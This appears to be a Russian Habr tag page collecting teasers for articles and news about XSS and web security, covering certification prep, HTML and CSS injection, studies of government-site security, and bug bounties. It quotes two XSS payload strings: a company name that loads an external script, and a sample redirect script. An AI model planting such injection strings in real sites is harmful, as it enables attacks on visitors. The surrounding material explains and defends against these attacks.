Привет, Хабр! Меня зовут Никита, я пентестер, специализируюсь на веб-тестировании. Наверняка многие из вас задумывались о подтверждении своей экспертизы с помощью некоторых сертификаций. Сегодня хочу поговорить о популярной сертификации от академии PortSwigger — BSCP, посвященной тестированию веб-приложений. Прежде чем приступить к изучению материалов для подготовки к BSCP, я уже имел хорошее представление об основных веб-уязвимостях из списка OWASP TOP-10. Также я знал, как эксплуатировать базовые уязвимости, такие как SQL-injection, XSS, Server-Side Template Injection и многие другие. Но на одном из этапов я задался вопросом: как всё-таки к нему эффективно подготовиться?
В этой статье я поделюсь лайфхаками по подготовке к сертификации, покажу, как может помочь встроенный в Burp Suite сканер уязвимостей, и подробно разберу каждый из этапов самого экзамена.
Красавица и HTML Injection. Почему HTMLi не только про дефейс
Привет, Хабр. Сегодня мы посмотрим на достаточно тривиальную тему с совсем нетривиальной стороны. Пожалуй, для каждого вебера HTML-инъекции являются темой, которой зачастую уделяют не очень много внимания. Взять даже собеседования: когда в последний раз вас спрашивали не об XSS'ках, а об HTML-инъекциях?
Сегодня я попробую рассказать про большую часть интересных векторов, которые мы можем использовать при ограничении в применении JS. Не стесняйтесь пользоваться оглавлением, потому что статья подготовлена для разного уровня читателей. Чтобы не обделять новичков, я достаточно подробно описал работу HTML, ее структуры и даже то, как HTML парсится браузером!
Обычный Client Side с необычной эксплуатацией
Это статья о клиентских уязвимостях, которые мне показались интересными.
Целью статьи является показать, что иногда из, казалось бы, скучных уязвимостей с низким импактом, можно выжимать больше, чем кажется.
Неочевидные угрозы: как защититься от атак на десериализацию, XSS и чтение произвольных файлов
Злоумышленники могут успешно атаковать 98% веб-приложений. И это не просто громкие цифры, а данные из исследования Positive Technologies. Как такое возможно, если есть инструменты и практики типа SAST, DAST и WAF, а разработчики вроде бы нормально кодят?
Давайте я объясню, как устроены опасные атаки, на примере с разработчиком Василием, который работает в интернет-магазине и которому начальство подкидывает разные ***интересные*** задачки.
Ладья на XSS: как я хакнул chess.com детским эксплойтом
Шахматы – это одно из многих моих хобби, за которыми я провожу свободное время, когда не ковыряюсь с какой-нибудь электроникой. При этом играю я так себе, и когда мне изрядно надоело проигрывать, я решил заняться тем, что у меня получается гораздо лучше… хакнуть систему!
В этой статье я расскажу о том, как использовал свои знания по кибербезопасности для обнаружения XSS-уязвимости (Cross-Site Scripting, межсайтовый скриптинг) на крупнейшем шахматном сайте интернета со 100 миллионами участников – Chess.com. Но для начала небольшое вступление (в котором будет затронута немного менее серьёзная, но достаточно занятная, уязвимость OSRF (On-site Request Forgery, подделка запросов на сайте).
CSS и безопасность данных
Различные компоненты фронтенда традиционно являются вотчиной веб разработчиков и дизайнеров и они не всегда задумываются о безопасности контента. В этой статье я предлагаю поговорить о безопасности CSS.
Для начала вспомним, что такое кросссайтскриптинг (CSS). XSS это тип атаки на веб-ресурсы, заключающийся во внедрении в выдаваемую сайтом страницу произвольного кода (который будет выполнен на компьютере пользователя при открытии им этой страницы) и взаимодействии этого кода с веб-сервером злоумышленника.
В течение нескольких лет современные браузеры, такие как Chrome или Firefox, пытались защитить пользователей веб-приложений от различных атак, в том числе XSS. Они делали это с помощью XSS-фильтров, которые во многих случаях позволяли им блокировать такие атаки. Однако эти фильтры оказывались все менее и менее эффективными, и браузеры, такие как Chrome, постепенно отключают их в поисках альтернативных методов защиты. Принцип работы XSS-фильтров довольно прост. Когда ваш веб-браузер отправляет запрос на веб-сайт, его встроенный фильтр межсайтовых сценариев проверяет, есть ли в запросе исполняемый JavaScript, например, блок <script> или HTML-элемент со встроенным обработчиком событий. Также проверяется, есть ли исполняемый JavaScript в ответе от сервера
Теоретически это должно хорошо работать, но на практике это легко обойти, и также нет защиты на стороне клиента от XSS-атак.
Давайте посмотрим, как можно украсть конфиденциальные данные с помощью каскадных таблиц стилей (CSS).
Обнаружение XSS-уязвимостей (межсайтовый скриптинг) с помощью Python
Эта статья посвящена тому, как обнаружить уязвимости межсайтового скриптинга (XSS) в веб-приложениях с помощью Python. XSS - это серьезный недостаток безопасности, который позволяет злоумышленникам внедрять вредоносные скрипты в веб-страницу. Такие атаки могут скомпрометировать конфиденциальные данные пользователей, украсть куки сеанса или нарушить нормальное функционирование веб-приложения. В этой статье мы рассмотрим фундаментальные принципы XSS-атак и продемонстрируем, как язык программирования Python может стать эффективным инструментом для обнаружения таких уязвимостей. Мы подчеркнем, что XSS - это не только техническая проблема, но и серьезные последствия для безопасности и конфиденциальности реальных приложений.
Информационная безопасность госсайтов: усиление безответственности
ОД «Информация для всех» опубликовало результаты очередного исследования уровня информационной безопасности сайтов госорганов, проведенного в рамках проекта «Монитор госсайтов» и охватившего 81 сайт всех федеральных органов законодательной, исполнительной и судебной власти, а также госорганов с особым статусом – Генпрокуратуры, Соцфонда, Счетной палаты, ФФОМС, Центробанка и Центризбиркома.
Согласно докладу «Информационная безопасность сайтов государственных органов Российской Федерации: усиление безответственности», за прошедший год ситуация с информационной безопасностью госсайтов мало изменилась: средний балл исследованных сайтов в Индексе надежности HTTPS вырос на единицу и достиг 28, а средний балл в Индексе защищенности от XSS вырос на 4 – до 22.
Представители власти регулярно выражают озабоченность вопросами информационной безопасности государственных информационных систем и призывают усилить ответственность за их взлом, – отметил координатор проекта «Монитор госсайтов» Евгений Альтовский, – При этом ответственность тех, кто не защитил эти системы от взлома, либо не наступает, либо вовсе не предусмотрена.
В этом году первый госсайт федерального органа власти – официальный сайт МВД – вошел в группу А Индекса надежности HTTPS, набрав в нем 81 балл. В то же время, защищенное соединение со своими посетителями не поддерживает каждый десятый сайт: среди них сайты Президента, Правительства, обеих палат парламента, и всех спецслужб – СВР, ФСБ и ФСО.
«Монитор госсайтов» опубликовал рейтинг субъектов федерации за 2023 год
ОД «Информация для всех» опубликовало доклад «Информационная безопасность сайтов государственных органов субъектов федерации – 2023», подготовленный в рамках проекта «Монитор госсайтов».
«Яндекс» запустил новый конкурс по усилению защиты данных в рамках своей программы «Охоты за ошибками»
25 декабря 2023 года «Яндекс» запустил очередной конкурс по усилению защиты данных в рамках текущей багбаунти программы «Охоты за ошибками». Этичным хакерам предлагается активно искать в сервисах компании ошибки и уязвимости типа XSS, которые могут привести к раскрытию чувствительной информации. Конкурс продлится до 31 января. В это время награда за все типы XSS-уязвимостей увеличена в несколько раз. Максимальная выплата по этому направлению составит 500 тысяч рублей.
Вышел AcyMailling v.8.7.1 — релиз безопасности
Вышел AcyMailling v.8.7.1 - релиз безопасности. AcyMailling - один из самых развитых и популярных компонентов email-маркетинга для для Joomla и WordPress. Весной 2023 года хакерами в коде компонента была найдена уязвимость, за которой последовала серия взломов сайтов.
Разбитое ветровое стекло Tesla Model 3 принесло хакеру $10 000 по программе Bug Bounty
Идея в том, что название хакерского автомобиля с XSS-пейлоадом всплывёт где-нибудь во внутренних системах Tesla Motors
Специалист по безопасности Сэм Карри рассказал, как ему удалось обнаружить критическую уязвимость в приложении удалённой диагностики Tesla Model 3. Этот автомобиль со встроенным веб-браузером, бесплатным LTE и беспроводным обновлением программного обеспечения — настоящий компьютер на колёсах.
Итак, все началось с того, что ему в ветровое стекло попал камень. Здесь-то и сработал установленный заранее XSS-хантер.
Исследование: российские государственные сайты свободно делятся информацией о посетителях с иностранцами
Официальные сайты российских федеральных органов власти слабо защищаются от XSS-уязвимостей: 59% из них передают данные о посетителях ресурсам, которые контролируются иностранными организациями. Об этом говорится в исследовании специалистов Общественного движения «Информация для всех», которые провели мониторинг интернет-ресурсов органов власти федерального уровня.
В британском реестре компаний обнаружили XSS
Выпуск комикса XKCD 327 «Мамины эксплойты» в переводе xkcd.ru
20 октября некто Джим Уокер поделился на форуме разработчиков британского государственного реестра компаний Companies House интересным наблюдением. Companies House допускает в именах компаний символы < и >. Это открывает простор для атак на тех сайтах, которые не фильтруют и не экранируют управляющие символы корректным образом. Если сайт отображает название компании и не санитизирует данные, то он потенциально уязвим к XSS-атаке.
Уокер обнаружил, что 16 октября некий Майкл Джон Тэнди зарегистрировал компанию с названием
"><SCRIPT SRC=HTTPS://MJT.XSS.HT></SCRIPT> LTD
. Если XSS-фильтра нет, то такое имя компании внедряет на веб-страницу код, который вызывает внешний JavaScript.96% госсайтов не соответствуют требованиям НПА по информационной безопасности
ОД «Информация для всех» опубликовало результаты очередного исследования уровня информационной безопасности сайтов государственных органов Российской Федерации, проведенного в рамках проекта «Монитор госсайтов». Исследование охватило 83 сайта всех федеральных органов законодательной, исполнительной и судебной власти, а также государственных органов Российской Федерации.
Хакеры взломали платежный портал и сайты группировки REvil
По заявлениям партнеров вымогательской группировки REvil, хакеры захватили платежные системы и сайт утечек. Об этом пишет SecurityLab.
Использование XSLT для предотвращения XSS путем фильтрации пользовательского контента
Формулировка проблемы
Думаю никому из веб-разработчиков не нужно объяснять что такое XSS и чем он опасен. Но в то же время, многие сайты, такие как форумы, блоги, социальные сети и т.п., стремятся предоставить пользователю возможность вставлять на страницу свой контент. Для удобства неискушенных пользователей изобретаются WYSIWYG-редакторы, делающие процесс добавления красивого комментария легким и приятным. Но за всем этим фасадом скрывается угроза безопасности. Фактически любой WYSIWYG-редактор отправляет на сервер не просто текст комментария, он отправляет HTML-код. И даже если сам редактор не предусматривает использования опасных HTML-тегов (например <iframe>), то злоумышленника это не остановит — он может послать на сервер произвольный HTML-текст, который может представлять опастность для других посетителей сайта. Я думаю мало кому понравится получить в свой браузер что-то наподобие:
<script type="text/javascript">window.location="http://hardcoresex.com/";</script>
Таким образом, возникает проблема: полученный от пользователя HTML-код необходимо фильтровать. Но что значить «фильтровать»? Каким должен быть алгоритм фильтрации, чтобы не создавать необоснованных ограничений легальным пользователям, но в то же время сделать невозможной XSS-атаку со стороны злоумышленника? Увы, но HTML достаточно сложен, написать хороший парсер достаточно непросто, а любая ошибка в нем может привести к тому, что у злоумышленника появится лазейка через которую он сможет нанести удар.
Reflected XSS на поддомене Пентагона (и к чему это привело)
Хакерами из Tunisian Cyber Army и Al Qaida Electronic Army была обнаружена reflected XSS на поддомене сайта Пентагона, а именно на поддомене Национальной Гвардии: g1arng.army.pentagon.mil/Pages/Default.ASPX.
С ее помощью они смогли украсть куки администратора сайта и получить доступ к его почте и нескольким критичным файлам. Этот взлом был осуществлен при содействии китайских хакеров, в ходе операции #opBlackSummer.
Конкурс уязвимостей, или Ломай меня полностью!
И для начала немного статистики:
- за первые две недели участники прислали нам почти 500 заявок с потенциальными уязвимостями;
- около 50 заявок оказались дубликатами;
- каждая десятая заявка содержала в себе реальную уязвимость (самые опасные были исправлены в течение нескольких часов);
- Более 150 заявок составили ошибки, не связанные с безопасностью сайта, и около 10% из них относятся к платформам, не участвующим в конкурсе.
- большинство уязвимостей пришлось на самый главный компонент системы ― профиль (как только участники конкурса не издевались над аккаунтами пользователей: удаляли и загружали фотографии, манипулировали комментариями, интересами, личными данными и адресами электронной почты).
- Более половины присланных уязвимостей ― различные CSRF, в основном затрагивающие загруженный или написанный пользователями контент (удаление и загрузка фото и комментариев, работа с чёрным списком, избранным и т.д.).